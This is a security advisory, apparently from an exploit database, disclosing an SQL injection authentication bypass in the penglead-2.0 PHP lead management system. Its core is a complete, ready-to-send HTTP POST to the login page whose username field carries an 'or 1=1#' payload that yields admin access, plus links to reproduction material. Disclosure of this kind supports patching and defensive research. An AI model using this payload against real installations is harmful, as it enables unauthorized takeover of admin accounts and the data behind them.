penglead-2.0 SQLi-Bypass Authentication

2023.11.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Title: penglead-2.0 SQLi-Bypass Authentication ## Author: nu11secur1ty ## Date: 11/10/2023 ## Vendor: https://www.mayurik.com/ ## Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The id parameter is vulnerable to SQLi - Bypass Authentication attacks. The attacker can easily get access to the admin account of the system then he can do very malicious stuff etc. STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: ```MySQL POST /penglead/login.php HTTP/1.1 Host: 192.168.100.45 Cookie: PHPSESSID=3qa8cq3da9t9rvr621vov0shsh Content-Length: 88 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://192.168.100.45 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://192.168.100.45/penglead/login.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i Connection: close username=nu11secur1ty%27+or+1%3D1%23&password=FSFFGDDGDGFDG&g-recaptcha-response=&login= ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/penglead-2.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/11/penglead-20-sqli-bypass-authentication.html) ## Time spent: 00:05:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top